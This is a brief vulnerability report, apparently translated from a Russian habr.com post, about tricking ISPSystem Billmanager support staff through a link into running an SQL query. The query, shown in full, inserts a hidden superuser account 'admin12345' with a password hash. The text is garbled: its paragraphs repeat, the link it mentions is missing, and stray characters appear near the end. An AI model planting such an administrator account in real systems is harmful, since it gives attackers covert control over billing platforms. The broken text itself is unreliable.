Vulnerability in ISPSystem Billmanager
Hello!
The vulnerability is based on API flaws and social engineering.
The client forms an active request to the support service with a link (more often the tamer of links).
Which contains the link:
After that, the employee who has superuser rights grants the admin12345 account the superuser rights with the following SQL query:
As a temporary solution, give only one account the rights of the superuser, for the rest, disable this feature.
The vulnerability is based on API flaws and social engineering.
The client forms an active request to the support service with a link (more often the tamer of links).
Which contains the link:
After that, the employee who has superuser rights grants the admin12345 account the superuser rights with the following SQL query:
insert into user (id,name,account,password,realname,email,lang,superuser,disabled,support,remotesupport,changepasswd,sendsms)
values (23351,'admin12345',1,'$1$FALDvy2D$fqFzhtlSZrq1pDQ3fkrpr/','test
test','test@test.test','ru','1','0','0','0','2012-01-29','0');
As a temporary solution, give only one account the rights of the superuser, for the rest, disable this feature.
')
Source: https://habr.com/ru/post/137419/
All Articles